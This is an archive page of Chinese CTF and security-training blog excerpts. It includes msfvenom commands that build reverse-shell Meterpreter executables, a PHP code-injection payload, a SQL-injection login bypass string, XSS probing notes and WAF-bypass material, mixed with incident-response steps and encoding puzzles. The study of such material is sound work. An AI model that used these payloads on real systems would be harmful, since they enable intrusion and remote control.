06 2022 档案
摘要:任务一 访问服务器8080端⼝,找出ecshop版本号,将版本号作为flag提交**(数字)** 通过访问http://IP:8080 可以看到页面首页存在版本信息 访问网站,利用漏洞找到网站根目录的flag1,将flag1作为flag提交。 因为在网站根目录,直接尝试访问http://IP/fla
阅读全文
摘要:第二阶段 任务一 第一题: ?dcn=);show_source("flag.php");// 第二题:输入密码查看flag 密码是:13546 第三题:修改前端输入框大小 第四题:burp抓包--res模块重放 第五题:wireshark 第242包追中http流 读取flag到burp解密 任务
阅读全文
摘要:Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L
阅读全文
摘要:WAF是如何被绕过的 课程简介 WAF(Web应用防火墙,Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应用本身存在缺陷的情况下
阅读全文
摘要:编码 进制 十进制:20 八进制:024 十六进制:0x14 key和flag对应的ASCII key 107 101 121 KEY 75 69 89 flag 102 108 97 103 FLAG 70 76 65 71 Unicode 编码 例如:原文本:You had me at hell
阅读全文
摘要:应急响应 宏观题 1. 思路流程 信息收集>类型判断>抑制范围>深入分析>清理处置>输出报告 收集信息:收集客户信息和中毒主机信息,包括样本 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断网、DoS 等等 抑制范围:隔离使受害⾯不继续扩⼤ 深入分析:日志分析、进程分析、启动项分析、样本分
阅读全文
摘要:MISC 1. Utf-7解密 win7中utf-7工具解密 2. Wireshark分析 筛选http请求包,追踪流 3. wireshark文件导出 导出对象>>>http 4. png文件头补全 winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47
阅读全文
摘要:第一题 打开页面发现http://10.196.8.21:18083/calculate/ 利用python的requests库做计算, import re import requests import time url = 'http://10.196.8.21:18083/calculate/'
阅读全文
摘要:title: 记录对permate漏洞挖掘 categories: ctf 1.反射型xss 搜索框尝试xss语句,发现存在反射型xss 2.SQL注入 存在sql注入 --+注释,发现存在11个字段 http://10.196.8.31/home/index.php?m=tiezi&a=index
阅读全文
摘要:title: 记录对Piti's wonderful blog漏洞挖掘 categories: ctf 1.首页发现收索框,尝试xss,发现存在反射型xss漏洞 2.首页发现一个登陆框,发现万能用户登陆 admin’ or ‘1’=’1’ 3.用户登陆后看到写文章版,尝试存储型xss,过滤<scri
阅读全文
摘要:第一题:ASCII解码 第二题:base64 缺一半的64 不就是32 第三题:Escape 第四题:16进制 第五题:JSFUCK 第六题:quoted-printable 第七题:unicode 第八题:url 第十题:莫斯
阅读全文
摘要:HCTF-2018——WarmUp 打开页面F12发现 <!--source.php--> 访问这个页面,给出源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whi
阅读全文
摘要:题目一: $username = @clean((string)$_GET['username']); $password = @clean((string)$_GET['password']); 传参username和password对数据库做查询 $str=stripslashes($str);
阅读全文
摘要:unicode解密 \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u
阅读全文
摘要:web26 http://123.206.31.85:10026/ 代码审计发现,传入参赛num为数字并且str为字符串就会输出flag (if语句过滤了str的十进制和空字符,is_numeric 检测输入是否为数字) http://123.206.31.85:10026/?num=1&&str=
阅读全文

浙公网安备 33010602011771号